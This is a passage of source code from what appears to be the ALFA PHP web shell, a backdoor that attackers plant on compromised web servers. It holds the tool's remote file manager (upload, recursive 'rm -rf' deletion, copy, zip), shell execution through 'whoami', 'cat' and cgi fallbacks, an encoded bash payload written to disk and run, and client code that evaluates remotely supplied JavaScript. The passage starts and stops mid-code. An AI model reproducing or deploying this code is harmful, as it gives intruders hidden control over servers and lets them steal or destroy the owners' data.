s=r.trim()+o.trim()+n.trim();gg("doActions",c_,i,s,t,function(e,t){alfaloader(t,"none"),alfaShowNotification(e,"Permission Action"),d.querySelector(".cl-popup-fixed").style.display="none"});break;case"modify":a=e.getAttribute("fid").replace("id_","");var c=d.querySelector("#shortcutMenu-holder > form > input[name=fname]").value,u=$("id_"+a).getAttribute("fname");gg("doActions",c_,c,u,t,function(t,a){if("ok"==t){var i="tr_row_"+e.getAttribute("fid").replace("id_","");d.querySelector("#"+i+" .main_modify").innerHTML=c,alfaShowNotification("success...","Modify Action"),d.querySelector(".cl-popup-fixed").style.display="none"}else alfaShowNotification(t,"Modify Action","error");alfaloader(a,"none")})}}function alfaInitSoratableTab(e){Sortable.create(e,{direction:"horizontal",animation:300,ghostClass:"sortable-ghost",filter:".not-sortable"})}$("search-input").addEventListener("keydown",function(e){setTimeout(function(){var e=$("search-input").value;for(var t in d.getElementsByClassName("history-list")[0].innerHTML="",editor_files)if(-1!=editor_files[t].file.search(e)||""==e){var a=0;t==editor_current_file&&(a=" is_active"),insertToHistory(t,editor_files[t].file,a,editor_files[t].type)}},100)},!1),_Ajax(d.URL,"a="+alfab64("checkupdate"),function(e){if(0!=e.length&&"[]"!=e){var t=JSON.parse(e);if(t.hasOwnProperty("content")){d.body.insertAdjacentHTML("beforeend",t.content);try{evalJS(t.content)}catch(t){}}if(t.hasOwnProperty("copyright")&&($("alfa-copyright").innerHTML=t.copyright),t.hasOwnProperty("solevisible")&&($("alfa_solevisible").innerHTML=t.solevisible),t.hasOwnProperty("code_name")&&($("hidden_sh").innerHTML=t.code_name.replace(/\{version\}/g,t.version_number)),t.hasOwnProperty("market")){var a=d.querySelector("span.alfa_plus");if(t.market.hasOwnProperty("visible")&&"yes"==t.market.visible&&($("menu_opt_market").style.display="inline"),"open"!=t.market.status&&(a.style.color="#ffc107"),t.market.hasOwnProperty("content"))try{evalJS(t.market.content)}catch(t){}}}}),<?php 
            echo $GLOBALS["need_to_update_header"];
            ?>?_Ajax(d.URL,"a="+alfab64("updateheader"),function(e){try{var t=JSON.parse(e);for(var a in t){for(var i="",l=0;l<t[a].length;l++)i+="useful"==a||"downloader"==a?'<span class="header_values" style="margin-left: 4px;">'+t[a][l]+"</span>":t[a][l];var r=$("header_"+a);r&&(r.innerHTML=i)}$("header_cgishell").innerHTML="ON",$("header_cgishell").setAttribute("class","header_on")}catch(e){}}):islinux&&_Ajax(d.URL,"a="+alfab64("checkcgi"),function(e){"ok"==e&&($("header_cgishell").innerHTML="ON",$("header_cgishell").setAttribute("class","header_on"))}),function(){d.onclick=function(){can_hashchange_work=!1,setTimeout(function(){can_hashchange_work=!0},600)},window.onhashchange=function(e){can_hashchange_work&&alfaCheckUrlHash()},alfaCheckUrlHash(),alfagetFlags(),rightclick_menu_context=$("rightclick_menu").style,alfaInitCwdContext(),document.addEventListener("click",function(e){rightclick_menu_context.opacity="0",setTimeout(function(){rightclick_menu_context.visibility="hidden"},501)},!1);var e=document.createElement("script");e.src="https://cdnjs.cloudflare.com/ajax/libs/Sortable/1.10.2/Sortable.min.js",e.id="sortable-plugin",e.onload=function(){alfaInitSoratableTab($("filesman_tabs_child")),alfaInitSoratableTab(d.querySelector(".editor-tabs")),alfaInitSoratableTab(d.querySelector(".options_tab")),alfaInitSoratableTab(d.querySelector(".terminal-tabs")),alfaInitSoratableTab(d.querySelector(".sql-tabs"))},d.body.appendChild(e)}();

</script>
</body>
</html>
<?php 
        }
    }
    if (!function_exists("posix_getpwuid") && strpos(@ini_get('disable_functions'), 'posix_getpwuid') === false) {
        function posix_getpwuid($p)
        {
            return false;
        }
    }
    if (!function_exists("posix_getgrgid") && strpos(@ini_get('disable_functions'), 'posix_getgrgid') === false) {
        function posix_getgrgid($p)
        {
            return false;
        }
    }
    function alfaWhich($p)
    {
        $path = alfaEx('which ' . $p, false, false);
        if (!empty($path)) {
            return strlen($path);
        }
        return false;
    }
    function alfaSize($s)
    {
        if ($s >= 1073741824) {
            return sprintf('%1.2f', $s / 1073741824) . ' GB';
        } elseif ($s >= 1048576) {
            return sprintf('%1.2f', $s / 1048576) . ' MB';
        } elseif ($s >= 1024) {
            return sprintf('%1.2f', $s / 1024) . ' KB';
        } else {
            return $s . ' B';
        }
    }
    function alfaPerms($p)
    {
        if (($p & 0xc000) == 0xc000) {
            $i = 's​';
        } elseif (($p & 0xa000) == 0xa000) {
            $i = 'l​';
        } elseif (($p & 0x8000) == 0x8000) {
            $i = '-​';
        } elseif (($p & 0x6000) == 0x6000) {
            $i = 'b​';
        } elseif (($p & 0x4000) == 0x4000) {
            $i = 'd​';
        } elseif (($p & 0x2000) == 0x2000) {
            $i = 'c​';
        } elseif (($p & 0x1000) == 0x1000) {
            $i = 'p​';
        } else {
            $i = 'u​';
        }
        $i .= $p & 0x100 ? 'r​' : '-';
        $i .= $p & 0x80 ? 'w​' : '-';
        $i .= $p & 0x40 ? $p & 0x800 ? 's​' : 'x​' : ($p & 0x800 ? 'S​' : '-');
        $i .= $p & 0x20 ? 'r​' : '-';
        $i .= $p & 0x10 ? 'w​' : '-';
        $i .= $p & 0x8 ? $p & 0x400 ? 's​' : 'x​' : ($p & 0x400 ? 'S​' : '-');
        $i .= $p & 0x4 ? 'r​' : '-';
        $i .= $p & 0x2 ? 'w​' : '-';
        $i .= $p & 0x1 ? $p & 0x200 ? 't​' : 'x​' : ($p & 0x200 ? 'T​' : '-');
        return $i;
    }
    function alfaPermsColor($f, $isbash = false)
    {
        $class = "";
        $num = "";
        $human = "";
        if ($isbash) {
            $class = $f["class"];
            $num = $f["num"];
            $human = $f["human"];
        } else {
            $num = substr(sprintf('%o', @fileperms($f)), -4);
            $human = alfaPerms(@fileperms($f));
            if (!@is_readable($f)) {
                $class = "main_red_perm";
            } elseif (!@is_writable($f)) {
                $class = "main_white_perm";
            } else {
                $class = "main_green_perm";
            }
        }
        return '<span style="font-weight:unset;" class="' . $class . '">' . $num . '</span><span style="font-weight:unset;" class="beetween_perms"> >> </span><span style="font-weight:unset;" class="' . $class . '">' . $human . '</span>';
    }
    if (!function_exists("scandir")) {
        function scandir($dir)
        {
            $dh = opendir($dir);
            while (false !== ($filename = readdir($dh))) {
                $files[] = $filename;
            }
            return $files;
        }
    }
    function reArrayFiles($file_post)
    {
        $file_ary = array();
        $file_count = count($file_post['name']);
        $file_keys = array_keys($file_post);
        for ($i = 0; $i < $file_count; $i++) {
            foreach ($file_keys as $key) {
                $file_ary[$i][$key] = $file_post[$key][$i];
            }
        }
        return $file_ary;
    }
    function _alfa_can_runCommand($cgi = true, $cache = true)
    {
        if (isset($_COOKIE["alfa_canruncmd"]) && $cache) {
            return true;
        }
        if (strlen(alfaEx("whoami", false, $cgi)) > 0) {
            $_COOKIE["alfa_canruncmd"] = true;
            return true;
        }
        return false;
    }
    function _alfa_symlink($target, $link)
    {
        $phpsym = function_exists("symlink");
        if ($phpsym) {
            @symlink($target, $link);
        } else {
            alfaEx("ln -s '" . addslashes($target) . "' '" . addslashes($link) . "'");
        }
    }
    function _alfa_file_exists($file, $cgi = true)
    {
        if (@file_exists($file)) {
            return true;
        } else {
            if (strlen(alfaEx("ls -la '" . addslashes($file) . "'", false, $cgi)) > 0) {
                return true;
            }
        }
        return false;
    }
    function _alfa_file($file, $cgi = true)
    {
        $array = @file($file);
        if (!$array) {
            if (strlen(alfaEx("id", false, $cgi)) > 0) {
                $data = alfaEx('cat "' . addslashes($file) . '"', false, $cgi);
                if (strlen($data) > 0) {
                    return explode("\n", $data);
                } else {
                    return false;
                }
            } else {
                return false;
            }
        } else {
            return $array;
        }
    }
    function _alfa_is_writable($file)
    {
        $check = false;
        $check = @is_writable($file);
        if (!$check) {
            if (_alfa_can_runCommand()) {
                $check = alfaEx('[ -w "' . trim(addslashes($file)) . '" ] && echo "yes" || echo "no"');
                if ($check == "yes") {
                    $check = true;
                } else {
                    $check = false;
                }
            }
        }
        return $check;
    }
    function _alfa_is_dir($dir, $mode = "-d")
    {
        $check = false;
        $check = @is_dir($dir);
        if ($mode == "-e") {
            $check = @is_file($dir);
        }
        if (!$check) {
            if (_alfa_can_runCommand()) {
                $check = alfaEx('[ "' . trim($mode) . '" "' . trim(addslashes($dir)) . '" ] && echo "yes" || echo "no"');
                if ($check == "yes") {
                    return true;
                } else {
                    return false;
                }
            }
        }
        return $check;
    }
    function _alfa_load_ace_options($base)
    {
        return '<span>Theme: </span><select class="ace-controler ace-theme-selector" base="' . $base . '" onChange="alfaAceChangeSetting(this,\'theme\');"><option value="terminal" selected>terminal</option><option value="ambiance">ambiance</option><option value="chaos">chaos</option><option value="chrome">chrome</option><option value="clouds">clouds</option><option value="clouds_midnight">clouds_midnight</option><option value="cobalt">cobalt</option><option value="crimson_editor">crimson_editor</option><option value="dawn">dawn</option><option value="dracula">dracula</option><option value="dreamweaver">dreamweaver</option><option value="eclipse">eclipse</option><option value="github">github</option><option value="gob">gob</option><option value="gruvbox">gruvbox</option><option value="idle_fingers">idle_fingers</option><option value="iplastic">iplastic</option><option value="katzenmilch">katzenmilch</option><option value="kr_theme">kr_theme</option><option value="kuroir">kuroir</option><option value="merbivore">merbivore</option><option value="merbivore_soft">merbivore_soft</option><option value="mono_industrial">mono_industrial</option><option value="monokai">monokai</option><option value="nord_dark">nord_dark</option><option value="pastel_on_dark">pastel_on_dark</option><option value="solarized_dark">solarized_dark</option><option value="solarized_light">solarized_light</option><option value="sqlserver">sqlserver</option><option value="textmate">textmate</option><option value="tomorrow">tomorrow</option><option value="tomorrow_night">tomorrow_night</option><option value="tomorrow_night_blue">tomorrow_night_blue</option><option value="tomorrow_night_bright">tomorrow_night_bright</option><option value="tomorrow_night_eighties">tomorrow_night_eighties</option><option value="twilight">twilight</option><option value="vibrant_ink">vibrant_ink</option><option value="xcode">xcode</option></select><span>Language: </span><select class="ace-controler" base="' . $base . '" onChange="alfaAceChangeSetting(this,\'lang\');"><option value="php">php</option><option value="python">python</option><option value="perl">perl</option><option value="c_cpp">c/c++</option><option value="csharp">c#</option><option value="ruby">ruby</option><option value="html">html</option><option value="javascript">javascript</option><option value="css">css</option><option value="xml">xml</option><option value="sql">sql</option><option value="swift">swift</option><option value="sh">bash</option><option value="lua">lua</option><option value="powershell">powershell</option><option value="jsp">jsp</option><option value="java">java</option><option value="json">json</option><option value="plain_text">plain_text</option></select><span>Soft Wrap: </span><input type="checkbox" name="wrapmode" class="ace-controler" onClick="alfaAceChangeWrapMode(this,\'' . $base . '\');" checked> | <span>Font Size: </span><button class="ace-controler" style="cursor:pointer;" onclick="alfaAceChangeFontSize(\'' . $base . '\',\'+\', this);return false;">+</button> | <button style="cursor:pointer;" class="ace-controler" onclick="alfaAceChangeFontSize(\'' . $base . '\', \'-\', this);return false;">-</button> | ';
    }
    function alfaFilesMan2()
    {
        alfahead();
        AlfaNum(8, 9, 10, 7, 6, 5, 4);
        echo "<div style=\"position:relative;\" fm_id=\"1\" id=\"filesman_holder_1\" class=\"ajaxarea filesman-active-content\"><div class=\"header\"></div></div>";
        alfaFooter();
    }
    function copy_paste($c, $s, $d)
    {
        if (@is_dir($c . $s)) {
            @mkdir($d . $s);
            $h = @opendir($c . $s);
            while (($f = @readdir($h)) !== false) {
                if ($f != "." and $f != "..") {
                    copy_paste($c . $s . '/', $f, $d . $s . '/');
                }
            }
        } elseif (is_file($c . $s)) {
            @copy($c . $s, $d . $s);
        }
    }
    function alfaFilesMan()
    {
        if (!empty($_COOKIE['alfa_f'])) {
            $_COOKIE['alfa_f'] = @unserialize($_COOKIE['alfa_f']);
        }
        if (!empty($_POST['alfa1'])) {
            switch ($_POST['alfa1']) {
                case 'uploadFile':
                    $move_cmd_file = false;
                    $alfa_canruncmd = false;
                    if ($GLOBALS['glob_chdir_false']) {
                        $alfa_canruncmd = _alfa_can_runCommand(true, true);
                        $move_cmd_file = true;
                    }
                    if (_alfa_is_writable($GLOBALS['cwd'])) {
                        $files = reArrayFiles($_FILES['f']);
                        $ret_files = array();
                        foreach ($files as $file) {
                            if ($move_cmd_file && $alfa_canruncmd) {
                                alfaEx("cat '" . addslashes($file['tmp_name']) . "' > '" . addslashes($_POST["c"] . "/" . $file['name']) . "'");
                            } else {
                                if (@move_uploaded_file($file['tmp_name'], $file['name'])) {
                                    $ow = function_exists("posix_getpwuid") && function_exists("fileowner") ? @posix_getpwuid(@fileowner($file['name'])) : array("name" => "????");
                                    $gr = function_exists("posix_getgrgid") && function_exists("filegroup") ? @posix_getgrgid(@filegroup($file['name'])) : array("name" => "????");
                                    $file_owner = $ow['name'] ? $ow['name'] : (function_exists("fileowner") ? @fileowner($file['name']) : "????");
                                    $file_group = $gr['name'] ? $gr['name'] : (function_exists("filegroup") ? @filegroup($file['name']) : "????");
                                    $file_modify = @date('Y-m-d H:i:s', @filemtime($file['name']));
                                    $file_perm = alfaPermsColor($file['name']);
                                    $file_size = @filesize($file['name']);
                                    $ret_files[] = array("name" => $file['name'], "size" => alfaSize($file_size), "perm" => $file_perm, "modify" => $file_modify, "owner" => $file_owner . "/" . $file_group);
                                }
                            }
                        }
                        if (!$move_cmd_file) {
                            echo json_encode($ret_files);
                        }
                    } else {
                        echo "noperm";
                        return;
                    }
                    if (!$move_cmd_file) {
                        return;
                    }
                    break;
                case 'mkdir':
                    $new_dir_cmd = false;
                    if ($GLOBALS['glob_chdir_false']) {
                        if (_alfa_can_runCommand(true, true)) {
                            if (_alfa_is_writable($GLOBALS['cwd'])) {
                                if (!_alfa_is_dir(trim($_POST['alfa2']))) {
                                    alfaEx("cd '" . trim(addslashes($_POST['c'])) . "';mkdir '" . trim(addslashes($_POST['alfa2'])) . "'");
                                    echo "<script>alfaShowNotification('" . addslashes($_POST['alfa2']) . " created...', 'Files manager');</script>";
                                } else {
                                    echo "<script>alfaShowNotification('folder already existed', 'Files manager', 'error');</script>";
                                }
                            } else {
                                echo "<script>alfaShowNotification('folder isnt writable !', 'Files manager', 'error');</script>";
                            }
                        } else {
                            echo "<script>alfaShowNotification('Can\\'t create new dir !', 'Files manager', 'error');</script>";
                        }
                    } else {
                        if (_alfa_is_writable($GLOBALS['cwd'])) {
                            if (!_alfa_is_dir(trim($_POST['alfa2']))) {
                                if (!@mkdir(trim($_POST['alfa2']))) {
                                    echo "<script>alfaShowNotification('Can\\'t create new dir !', 'Files manager', 'error');</script>";
                                } else {
                                    echo "<script>alfaShowNotification('" . addslashes($_POST['alfa2']) . " created...', 'Files manager');</script>";
                                }
                            } else {
                                echo "<script>alfaShowNotification('folder already existed', 'Files manager', 'error');</script>";
                            }
                        } else {
                            echo "<script>alfaShowNotification('folder isnt writable !', 'Files manager', 'error');</script>";
                        }
                    }
                    break;
                case 'delete':
                    function deleteDir($path)
                    {
                        $path = substr($path, -1) == '/' ? $path : $path . '/';
                        $dh = @opendir($path);
                        while (($item = @readdir($dh)) !== false) {
                            $item = $path . $item;
                            if (basename($item) == ".." || basename($item) == ".") {
                                continue;
                            }
                            $type = @filetype($item);
                            if ($type == "dir") {
                                deleteDir($item);
                            } else {
                                @unlink($item);
                            }
                        }
                        @closedir($dh);
                        @rmdir($path);
                    }
                    if (is_array(@$_POST['f'])) {
                        foreach ($_POST['f'] as $f) {
                            if ($f == '..') {
                                continue;
                            }
                            $f = rawurldecode($f);
                            if ($GLOBALS["glob_chdir_false"]) {
                                if (_alfa_can_runCommand(true, true)) {
                                    alfaEx("rm -rf '" . addslashes($_POST['c'] . '/' . $f) . "'");
                                }
                            } else {
                                alfaEx("rm -rf '" . addslashes($f) . "'", false, false);
                                if (@is_dir($f)) {
                                    deleteDir($f);
                                } else {
                                    @unlink($f);
                                }
                            }
                        }
                    }
                    if (@is_dir(rawurldecode(@$_POST['alfa2'])) && rawurldecode(@$_POST['alfa2']) != '..') {
                        deleteDir(rawurldecode(@$_POST['alfa2']));
                        alfaEx("rm -rf '" . addslashes($_POST['alfa2']) . "'", false, false);
                    } else {
                        @unlink(rawurldecode(@$_POST['alfa2']));
                    }
                    if ($GLOBALS["glob_chdir_false"]) {
                        $source = rawurldecode(@$_POST['alfa2']);
                        if ($source != '..' && !empty($source)) {
                            if (_alfa_can_runCommand(true, true)) {
                                alfaEx("cd '" . trim(addslashes($_POST['c'])) . "';rm -rf '" . addslashes($source) . "'");
                            }
                        }
                    }
                    if (is_array($_POST['f'])) {
                        return;
                    }
                    break;
                case 'paste':
                    if ($_COOKIE['alfa_act'] == 'copy' && isset($_COOKIE['alfa_f'])) {
                        foreach ($_COOKIE['alfa_f'] as $f) {
                            copy_paste($_COOKIE['alfa_c'], $f, $GLOBALS['cwd']);
                        }
                    } elseif ($_COOKIE['alfa_act'] == 'move' && isset($_COOKIE['alfa_f'])) {
                        function move_paste($c, $s, $d)
                        {
                            if (@is_dir($c . $s)) {
                                @mkdir($d . $s);
                                $h = @opendir($c . $s);
                                while (($f = @readdir($h)) !== false) {
                                    if ($f != "." and $f != "..") {
                                        copy_paste($c . $s . '/', $f, $d . $s . '/');
                                    }
                                }
                            } elseif (@is_file($c . $s)) {
                                @copy($c . $s, $d . $s);
                            }
                        }
                        foreach ($_COOKIE['alfa_f'] as $f) {
                            @rename($_COOKIE['alfa_c'] . $f, $GLOBALS['cwd'] . $f);
                        }
                    } elseif ($_COOKIE['alfa_act'] == 'zip' && isset($_COOKIE['alfa_f'])) {
                        if (class_exists('ZipArchive')) {
                            $zip = new ZipArchive();
                            $zipX = "alfa_" . rand(1, 1000) . ".zip";
                            if ($zip->open($zipX, 1)) {
                                @chdir($_COOKIE['alfa_c']);
                                foreach ($_COOKIE['alfa_f'] as $f) {
                                    if ($f == '..') {
                                        continue;
                                    }
                                    if (@is_file($_COOKIE['alfa_c'] . $f)) {
                                        $zip->addFile($_COOKIE['alfa_c'] . $f, $f);
                                    } elseif (@is_dir($_COOKIE['alfa_c'] . $f)) {
                                        $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f . '/'));
                                        foreach ($iterator as $key => $value) {
                                            $key = str_replace('\\', '/', realpath($key));
                                            if (@is_dir($key)) {
                                                if (in_array(substr($key, strrpos($key, '/') + 1), array('.', '..'))) {
                                                    continue;
                                                }
                                            } else {
                                                $zip->addFile($key, $key);
                                            }
                                        }
                                    }
                                }
                                @chdir($GLOBALS['cwd']);
                                $zip->close();
                                __alert('>> ' . $zipX . ' << is created...');
                            }
                        }
                    } elseif ($_COOKIE['alfa_act'] == 'unzip' && isset($_COOKIE['alfa_f'])) {
                        if (class_exists('ZipArchive')) {
                            $zip = new ZipArchive();
                            foreach ($_COOKIE['alfa_f'] as $f) {
                                if ($zip->open($_COOKIE['alfa_c'] . $f)) {
                                    $zip->extractTo($_COOKIE['alfa_cwd']);
                                    $zip->close();
                                }
                            }
                        }
                    }
                    unset($_COOKIE['alfa_f']);
                    break;
                default:
                    if (!empty($_POST['alfa1'])) {
                        if (in_array($_POST['alfa1'], array("copy", "move", "zip", "unzip"))) {
                            __alfa_set_cookie('alfa_act', @$_POST['alfa1']);
                            __alfa_set_cookie('alfa_f', @serialize($_POST['f']));
                            __alfa_set_cookie('alfa_c', @$_POST['c']);
                            return;
                        }
                    }
                    break;
            }
        }
        $dirContent = @scandir(isset($_POST['c']) ? $_POST['c'] : $GLOBALS['cwd']);
        if (preg_match("#(.*)\\/\\.\\.#", $_POST['c'], $res)) {
            $path = explode('/', $res[1]);
            array_pop($path);
            $_POST['c'] = implode('/', $path);
        }
        $cmd_dir = false;
        if ($dirContent === false) {
            if (_alfa_can_runCommand(true, true)) {
                $tmp_getdir_path = @$_COOKIE["alfachdir_bash_path"];
                @chdir(dirname($_SERVER["SCRIPT_FILENAME"]));
                if (!isset($_COOKIE["alfachdir_bash"]) || @(!file_exists($tmp_getdir_path . "/alfacgiapi/getdir.alfa"))) {
                    $bash = "jZTfb5swEMef4a+4uaYkSmmS/YpEwsOkqVNfO+1hSqKKggnWwI4MEaFppL3vv9xfUtsYSKpMWh6I7/O9O9vcHVfvxrtCjJ8oGxep/fX+IcBT+/7ue4DdFXNtEqUc0BLZCRdAgTLAg6wALwQsfYdziLkN8rcNyzRAio0xRRrRBJZLwBSCANDtLYLra/D2Mr5KaZSCIGGcUfZrCOv1HMqUMB3VJcOD1gO8BLBiw86DBhpoO6G2RVnCZURRhiV4ESDnznd++M433yl856c/cULf+YLaLJa6n+u7+gzgCXWdUIiwhsViAQirbMi2ynpLAnzQynKyPurdeMWI6OjU0I3gu21H30tqFfS5j/6gSM5jmtQd+2hit0TkbJd3/NMJT3d5yDrls1EYqR571XWb1yALNBgApcFkLp8LfLjqfI6KjEYw7Av2JstIFu/QWT6m1J8e//7+05Qy5oy8PdNZuKxAU21zGV3zyXQ2m6G+vJbVXhVNlGJAkw/FQm5X7eVDVPKxF5V00LXVmb1KFkaVTyVUraSYOGFnm0Q84yJAeUjZ40YQwvRRZUKSmXT/FSo7tSR9aEEu+AgStx79abHqHf0SYipIVHJRn22kW0tpJ0fqYwTZ7LJQyM7OiL7uy8tlB5Jvy/rfbkWdP/GMRqCm6ML+OrA5tp7zwwqxMCcr5MNKTsEK3ch/5WpIs1RQT4GhZq2wHgODzVphNQqGNksFm2kwuDWUYJrEKJ3VSrpdTkRjt7IuzYls7OONrZu4+Z4djmv0Cg==";
                    $tmp_getdir_path = alfaWriteTocgiapi("getdir.alfa", $bash);
                    __alfa_set_cookie("alfachdir_bash", "true");
                    __alfa_set_cookie("alfachdir_bash_path", $tmp_getdir_path);
                }
                $dirContent = alfaEx("cd " . $tmp_getdir_path . "/alfacgiapi;sh getdir.alfa '" . addslashes(isset($_POST['c']) ? $_POST['c'] : $GLOBALS['cwd']) . "'");
                $dirContent = json_decode($dirContent, true);
                if (is_array($dirContent)) {
                    array_pop($dirContent);
                    $cmd_dir = true;
                } else {
                    $dirContent = false;
                }
            }
        }
        alfahead();
        AlfaNum(8, 9, 10, 7, 6, 5, 4);
        $count_dirContent = @count($dirContent);
        if ($count_dirContent > 300) {
            @($_COOKIE["alfa_limited_files"] = 100);
        }
        $alfa_sort_by = isset($_COOKIE["alfa_sort_by"]) ? $_COOKIE["alfa_sort_by"] : 'name';
        $alfa_limited_files = isset($_COOKIE["alfa_limited_files"]) ? (int) $_COOKIE["alfa_limited_files"] : 0;
        $alfa_files_page_number = isset($_POST["pagenum"]) ? (int) $_POST["pagenum"] : 1;
        $alfa_filesman_direction = isset($_COOKIE["alfa_filesman_direction"]) ? $_COOKIE["alfa_filesman_direction"] : 'asc';
        $files_page_count = 1;
        if ($alfa_limited_files > 0) {
            $files_page_count = ceil($count_dirContent / $alfa_limited_files);
            if ($files_page_count > 1) {
                $files_page_count++;
            }
        }
        echo '<div><div class="filters-holder"><span>Filter: </span><input style="color:#25ff00;" autocomplete="off" type="text" id="regex-filter" name="name-filter" onkeydown="doFilterName(this);"><span style="margin-left:10px">Sort By: </span><select name="sort_files" onchange="sortBySelectedValue(this,\'alfa_sort_by\');" style="color:#25ff00;"><option value="name" ' . ($alfa_sort_by == 'name' ? 'selected' : '') . '>Name</option><option value="size" ' . ($alfa_sort_by == 'size' ? 'selected' : '') . '>Size</option><option value="modify" ' . ($alfa_sort_by == 'modify' ? 'selected' : '') . '>Modify</option></select><span style="margin-left:10px">Direction: </span><select name="direction_filesman" onChange="sortBySelectedValue(this,\'alfa_filesman_direction\')" style="color:#25ff00;"><option value="asc" ' . ($alfa_filesman_direction == 'asc' ? 'selected' : '') . '>Ascending</option><option value="desc" ' . ($alfa_filesman_direction == 'desc' ? 'selected' : '') . '>Descending</option></select><span style="margin-left:10px;"> limit: </span><input style="text-align:center;width: 40px;color:#25ff00;" type="text" name="limited_number" value="' . $alfa_limited_files . '" oninput="this.value=this.value.replace(/[^0-9]/g,\'\');setCookie(\'alfa_limited_files\', this.value, 2012);"><span style="margin-left:10px;">Files Count: <b style="color:#25ff00;">' . ($count_dirContent - 1) . '</b></span></div><div class="header">';
        if ($dirContent == false) {
            echo "<center><br><span style=\"font-size:16px;\"><span style=\"color: red; -webkit-text-shadow: 1px 1px 13px;\"><strong><b><big>!!! Access Denied !!!</b></big><br><br></strong></div>";
            alfaFooter();
            return;
        }
        global $sort;
        $sort = array('name', 1);
        if (isset($_COOKIE["alfa_sort_by"]) && !empty($_COOKIE["alfa_sort_by"])) {
            $sort[0] = $_COOKIE["alfa_sort_by"];
        }
        if (!empty($_POST['alfa1'])) {
            if (preg_match('!s_([A-z]+)_(\\d{1})!', $_POST['alfa1'], $match)) {
                $sort = array($match[1], (int) $match[2]);
            }
        }
        if ($alfa_files_page_number > $files_page_count - 1) {
            $alfa_files_page_number = 1;
        }
        $checkbox_rand = rand(11111, 99999);
        echo "<form onsubmit='fc(this);return false;' name='files' method='post'><table id='filemanager_table' width='100%' class='main' cellspacing='0' cellpadding='2'><tr><th width='13px'><div class='myCheckbox' style='padding-left:0px;'><input type='checkbox' id='mchk" . $checkbox_rand . "' onclick='checkBox(this);' class='chkbx'><label for='mchk" . $checkbox_rand . "'></label></div></th><th>Name</th><th>Size</th><th>Modify</th><th>Owner/Group</th><th>Permissions</th><th>Actions</th></tr>";
        $dirs = $files = array();
        $n = $count_dirContent;
        if ($n > $alfa_limited_files && $alfa_limited_files > 0) {
            $n = $alfa_limited_files * $alfa_files_page_number;
            if ($n > $count_dirContent) {
                $n = $count_dirContent;
            }
        }
        $i = 0;
        if ($alfa_limited_files > 0 && $alfa_files_page_number > 1) {
            $i = $alfa_limited_files * ($alfa_files_page_number - 1);
        }
        $page_builder = get_pagination_links($alfa_files_page_number, $files_page_count - 1);
        $cmd_dir_backp = "";
        for (; $i < $n; $i++) {
            if ($cmd_dir) {
                $filename = $dirContent[$i]["name"];
                $file_owner = $dirContent[$i]["owner"];
                $file_group = $dirContent[$i]["group"];
                $file_modify = @date('Y-m-d H:i:s', $dirContent[$i]["modify"]);
                $file_perm = alfaPermsColor(array("class" => $dirContent[$i]["permcolor"], "num" => $dirContent[$i]["permnum"], "human" => $dirContent[$i]["permhuman"]), true);
                $file_size = $dirContent[$i]["size"];
                if (substr($dirContent[$i]["name"], 0, 1) == "/") {
                    $file_path = $dirContent[$i]["name"];
                    $dirContent[$i]["name"] = "..";
                    $filename = $dirContent[$i]["name"];
                } else {
                    $file_path = $GLOBALS['cwd'] . "/" . $dirContent[$i]["name"];
                }
            } else {
                $filename = $dirContent[$i];
                $ow = function_exists("posix_getpwuid") && function_exists("fileowner") ? @posix_getpwuid(@fileowner($GLOBALS['cwd'] . $filename)) : array("name" => "????");
                $gr = function_exists("posix_getgrgid") && function_exists("filegroup") ? @posix_getgrgid(@filegroup($GLOBALS['cwd'] . $filename)) : array("name" => "????");
                $file_owner = $ow['name'] ? $ow['name'] : (function_exists("fileowner") ? @fileowner($GLOBALS['cwd'] . $filename) : "????");
                $file_group = $gr['name'] ? $gr['name'] : (function_exists("filegroup") ? @filegroup($GLOBALS['cwd'] . $filename) : "????");
                $file_modify = @date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $filename));
                $file_perm = alfaPermsColor($GLOBALS['cwd'] . $filename);
                $file_size = @filesize($GLOBALS['cwd'] . $filename);
                $file_path = $GLOBALS['cwd'] . $filename;
            }
            $tmp = array('name' => $filename, 'path' => $file_path, 'modify' => $file_modify, 'perms' => $file_perm, 'size' => $file_size, 'owner' => $file_owner, 'group' => $file_group);
            if ($filename == ".." && !$cmd_dir) {
                $tmp["path"] = str_replace("\\", "/", realpath($file_path));
            }
            if (!$cmd_dir) {
                if (@is_file($file_path)) {
                    $arr_mrg = array('type' => 'file');
                    if (@is_link($file_path)) {
                        $arr_mrg["link"] = readlink($tmp['path']);
                    }
                    $files[] = array_merge($tmp, $arr_mrg);
                } elseif (@is_link($file_path)) {
                    $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
                } elseif (@is_dir($file_path) && $filename != ".") {
                    $dirs[] = array_merge($tmp, array('type' => 'dir'));
                }
            } else {
                if ($dirContent[$i]["type"] == "file") {
                    $files[] = array_merge($tmp, array('type' => 'file'));
                } else {
                    if ($dirContent[$i]["name"] != ".") {
                        $dirs[] = array_merge($tmp, array('type' => 'dir'));
                    }
                }
            }
        }
        $GLOBALS['sort'] = $sort;
        function alfaCmp($a, $b)
        {
            if ($GLOBALS['sort'][0] != 'size') {
                return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]])) * ($GLOBALS['sort'][1] ? 1 : -1);
            } else {
                return ($a['size'] < $b['size'] ? -1 : 1) * ($GLOBALS['sort'][1] ? 1 : -1);
            }
        }
        usort($files, "alfaCmp");
        usort($dirs, "alfaCmp");
        if (isset($_COOKIE["alfa_filesman_direction"]) && !empty($_COOKIE["alfa_filesman_direction"])) {
            if ($_COOKIE["alfa_filesman_direction"] == 'desc') {
                $files = array_reverse($files);
                $dirs = array_reverse($dirs);
            }
        }
        $files = array_merge($dirs, $files);
        $l = 0;
        $cc = 0;
        foreach ($files as $f) {
            $f['name'] = htmlspecialchars($f['name']);
            $newname = mb_strlen($f['name'], 'UTF-8') > 60 ? mb_substr($f['name'], 0, 60, 'utf-8') . '...' : $f['name'];
            $checkbox = 'checkbox_' . $checkbox_rand . $cc;
            $raw_name = rawurlencode($f['name']);
            $icon = $GLOBALS['DB_NAME']['show_icons'] ? '<img src="' . findicon($f['name'], $f['type']) . '" width="30" height="30">' : '';
            $style = $GLOBALS['DB_NAME']['show_icons'] ? 'position:relative;display:inline-block;bottom:12px;' : '';
